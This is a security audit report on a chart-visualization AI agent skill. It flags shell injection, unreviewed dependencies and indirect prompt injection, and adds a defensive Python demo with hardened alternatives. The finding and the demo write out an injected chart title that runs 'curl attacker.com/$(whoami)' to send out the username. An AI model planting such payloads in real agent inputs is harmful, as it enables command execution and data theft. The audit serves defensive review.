chart-visualization

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Tags: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Potential shell injection in the execution workflow. SKILL.md instructs the agent to run python ./scripts/generate.py '<payload_json>'. Because <payload_json> is assembled from parameters the agent extracts from user input (such as title or data), and a single quote cannot be escaped inside a single-quoted POSIX shell argument, an attacker who places a single quote in any of those fields terminates the argument and appends arbitrary shell commands (e.g. a title of ' ; curl attacker.com/$(whoami) ; '), which the shell runs alongside the script.
  • [REMOTE_CODE_EXECUTION] (MEDIUM): The skill depends on a local script, ./scripts/generate.py, and on several reference files under references/ that are not included in the skill package. This is an unverifiable-dependency risk: the code that parses the JSON payload and renders the chart cannot be reviewed, so it could perform arbitrary or malicious operations when the agent runs it.
  • [PROMPT_INJECTION] (HIGH): Significant indirect prompt injection surface. The skill is designed to ingest untrusted user data in order to 'intelligently select' a chart type and extract parameters. Because that data flows into a shell command with no sanitization and no boundary-marker instructions separating data from instructions, malicious input can redirect the agent's logic to perform unintended actions or exfiltrate data through the generated payload.
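The following is an added example, not code from the chart-visualization skill or from the Gen Agent Trust Hub. It reproduces the data-to-command path behind the COMMAND_EXECUTION and PROMPT_INJECTION findings: a constructed chart title containing a single quote is serialized to JSON, dropped into the quoted argument exactly as SKILL.md prescribes, and tokenized the way a POSIX shell would (without executing anything), so the injected curl shows up as its own command. It then shows two hardened forms, an argv list with no shell and shlex.quote for the case where a shell string is unavoidable. Because ./scripts/generate.py is not in the package, run_generator_safely uses a hypothetical inline stand-in script that only echoes the parsed title.

```python
"""Shell-injection path from the COMMAND_EXECUTION finding (added example).

Not the skill's own code. Demonstrates why interpolating agent-extracted JSON
into a single-quoted shell argument is exploitable, and how to pass the
payload as data instead.
"""
import json
import shlex
import subprocess
import sys

# Constructed attacker-controlled chart title, the same shape the finding cites.
MALICIOUS_TITLE = "' ; curl attacker.com/$(whoami) ; '"


def build_payload(title, data):
    """Build the <payload_json> the skill would extract from user input.

    json.dumps escapes double quotes, backslashes and control characters only,
    so a single quote in the title survives into the serialized payload."""
    return json.dumps({"title": title, "data": data})


def naive_command(payload_json):
    """The pattern SKILL.md prescribes: the JSON is interpolated into quotes."""
    return f"python ./scripts/generate.py '{payload_json}'"


def shell_words(command):
    """Tokenize like a POSIX shell would, without executing anything."""
    return shlex.split(command)


def safe_argv(payload_json):
    """Hardened form: an argv list handed to subprocess with no shell at all."""
    return ["python", "./scripts/generate.py", payload_json]


def safe_command_string(payload_json):
    """If a shell string is unavoidable, shlex.quote neutralizes the quotes."""
    return "python ./scripts/generate.py " + shlex.quote(payload_json)


def run_generator_safely(payload_json):
    """Run a stand-in for ./scripts/generate.py with the payload as argv data.

    The real script is not in the skill package, so a hypothetical inline
    script that just echoes the parsed title is used here. With no shell in
    the loop, the attacker's quotes and ';' arrive as literal characters."""
    stand_in = "import json, sys; print(json.loads(sys.argv[1])['title'])"
    proc = subprocess.run(
        [sys.executable, "-c", stand_in, payload_json],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = build_payload(MALICIOUS_TITLE, [1, 2])
    # The naive command splits into: python, ./scripts/generate.py, a truncated
    # JSON fragment, ';', 'curl', 'attacker.com/$(whoami)', ';', the remainder.
    print("naive tokens :", shell_words(naive_command(payload)))
    # The quoted form stays three tokens with the payload intact.
    print("safe tokens  :", shell_words(safe_command_string(payload)))
    print("title seen by script:", run_generator_safely(payload))
```

The tokenized naive command makes the finding concrete: the shell sees curl as a separate command, and $(whoami) would be expanded by the shell before curl ever runs. The argv-list form is the one to prefer; shlex.quote is a fallback for agents that can only emit a command string, and it does nothing about the prompt-injection half of the problem, which still needs the data to be marked as data in the instructions the agent follows.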
Recommendations
  • The audit flagged serious security threats. Pass the payload to the script as a separate argument or over stdin rather than interpolating it into a shell string, include ./scripts/generate.py and the references/ files in the skill package so they can be reviewed, and instruct the agent to treat user-supplied chart data as data only, delimited by boundary markers.
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 09:08 AM